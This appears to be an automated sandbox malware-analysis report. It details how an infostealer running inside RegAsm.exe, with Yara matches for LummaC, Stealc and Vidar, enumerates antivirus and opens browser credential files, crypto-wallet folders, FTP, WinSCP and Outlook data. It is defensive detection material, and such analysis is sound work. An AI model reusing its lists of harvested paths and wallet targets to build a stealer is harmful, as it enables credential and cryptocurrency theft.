Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
Source: C:\Users\userEHJDHJKFIE.exe	Queries volume information: C:\Users\userEHJDHJKFIE.exe VolumeInformation
Source: C:\Users\userBAKKEGCAAE.exe	Queries volume information: C:\Users\userBAKKEGCAAE.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\GHDHDBAECG.exe	Queries volume information: C:\ProgramData\GHDHDBAECG.exe VolumeInformation
Source: C:\ProgramData\CBFIIEHJDB.exe	Queries volume information: C:\ProgramData\CBFIIEHJDB.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\KEHDBAEGII.exe	Queries volume information: C:\ProgramData\KEHDBAEGII.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\userDHDAFBFCFH.exe	Queries volume information: C:\Users\userDHDAFBFCFH.exe VolumeInformation
Source: C:\Users\userCAAKKFHCFI.exe	Queries volume information: C:\Users\userCAAKKFHCFI.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0054009B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

5_2_0054009B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004411F0 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError,

5_2_004411F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

15_2_00417A30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0042CEA0 RtlGetVersion,GetVersionExA,

5_2_0042CEA0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2705735289.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7856, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1895049208.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1364, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: passphrase.json
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: file__0.localstorage
Source: RegAsm.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: RegAsm.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5164, type: MEMORYSTR
